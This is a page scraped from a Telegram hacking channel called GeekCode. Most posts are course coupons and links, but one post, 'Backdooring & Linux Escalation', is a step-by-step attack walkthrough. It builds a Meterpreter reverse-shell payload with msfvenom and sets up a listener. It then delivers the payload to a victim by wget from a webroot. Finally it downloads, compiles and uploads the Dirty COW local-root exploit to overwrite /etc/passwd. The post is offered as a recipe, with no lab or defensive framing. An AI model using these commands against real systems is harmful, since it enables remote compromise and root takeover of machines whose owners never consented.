GeekCode
793 subscribers
452 photos
3 videos
7 files
942 links
🍁Cyber Security ❀️
🍁Hacking Resources πŸ‘¨β€πŸ’»

Providing knowledge to people'sπŸ₯€
Nobody gets smaller by sharing knowledge
You can also share your knowledge with us...πŸ™‚πŸ™‚

πŸ“°Promotion/Query - @geekcodevipbot
Download Telegram
Kali Linux Essentials For Ethical Hackers - Beginners Guide!

This course will teach you the basics of using the Kali linux essentials commands requried to get into ethical hacking!

Enroll here -:
https://www.udemy.com/course/kali-linux-essentials-for-ethical-hackers-beginners-guide/?couponCode=SSTEC3D

#share & #supportus

------------------> @geekcode πŸ“

Share as more as 😍
This media is not supported in your browser
VIEW IN TELEGRAM
Don't left us please πŸ™

@geekcode πŸ™πŸ˜”πŸ“
πŸ”°BACKDOORING & LINUX ESCALATIONπŸ”°

Do this :-

1] msfvenom -p python/meterpreter/reverse_tcp -f raw \ --platform python -a python -e generic/none LHOST=someip LPORT=someport \ >'somedir/filename.py'

2] -p payload 
-f fileformat
-e encoder 
> raw output 

3] Writing resource file
touch python_

Now copy and paste these commands

cat >>python_

use multi/handler
set payload python/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
set ExitOnSession false 
exploit -j

4] msfconsole -q (quite) -x to (execute command exec) 

loading resource file to start multi/handler 

msfconsole -q -r python_

5] now move python.py payload to webroot dir 
mv python.py /var/www/html/
sending payload to victim using wget 

wget http://ip/python.py

spawing python shell 

Now local root privilege exploit dirtyc0w comes in picture

what is dirtyc0w ?
dirtyc0w is local root exploit  

how does dirtyc0w work ?
dirtc0w backdoors /etc/passwd file to gain root access on target 
and overwrites itself to kernels memory 

6] before running any exploits recon is very important 

so we verify -- / kernel info / os version / codename / --

uname --all

7] cat /etc/*release

download the exploit here 

Code:-
wget https://exploit-db/download/40616.c

now compiling the source 

Code:-
gcc 40616.c -o dirtyc0w -pthread

now upload the compiled binary to target 

upload dirtyc0w [using meterpreter]
and execute the programm
./dirtyc0w

#share & #supportus

---------------> @geekcode πŸ“

Content by owner πŸ™

Share as more as 😍
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
Free guide to
Product Based company Interviews
(Expires Soon)


Coupon Link
https://bit.ly/3nXKAfQ

#share & #supportus

--------------> @geekcode πŸ“

Share as more as 😍
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”° WarBerryPi πŸ”°

WarBerryPi was built to be used as a hardware implant during red teaming scenarios where we want to obtain as much information as possible in a short period of time with being as stealth as possible.

◾️Link:- http://bit.ly/2EFEdZH

#share & #supportus

----------------> @geekcode

Share as more as 😍
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
Cybersecurity in 2020: lessons for tomorrow  IOL
https://www.iol.co.za/business-report/companies/cybersecurity-in-2020-lessons-for-tomorrow-44040f92-c389-4a0c-b01b-79816f6f7d68

#share & #supportus

--------------------> @geekcodeπŸ“

Share as more as😍
This media is not supported in your browser
VIEW IN TELEGRAM
HOW TO BACKUP COMPLETELY DAMAGE OPERATING SYSTEM

https://geekcode.com/Recover-Damaged-OS

#share & #supportus

------------------> @geekcode πŸ“

Share as more as 😍
This media is not supported in your browser
VIEW IN TELEGRAM